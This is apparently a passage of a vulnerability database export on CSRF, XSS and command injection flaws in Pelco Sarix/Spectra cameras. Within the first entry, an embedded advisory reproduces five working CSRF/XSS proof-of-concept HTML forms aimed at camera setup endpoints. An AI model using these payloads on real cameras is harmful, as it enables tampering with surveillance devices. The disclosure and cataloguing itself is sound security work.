"data": "A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_csrf.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7828",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16262",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143314",
"trust": 0.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2018-058-01",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070076",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"id": "VAR-201905-1040",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
}
]
},
"last_update_date": "2023-12-18T12:18:58.959000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/162751"
},
{
"title": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92890"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7828"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7828"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42308/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070076"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143314"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129666"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7236"
},
{
"trust": 0.1,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2018-058-01/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T20:29:01.307000",
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015521"
},
{
"date": "2019-05-28T12:37:18.473000",
"db": "NVD",
"id": "CVE-2018-7828"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16262"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-912"
}
],
"trust": 0.6
}
}
VAR-201905-1050
Vulnerability from variot - Updated: 2023-12-18 12:18A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
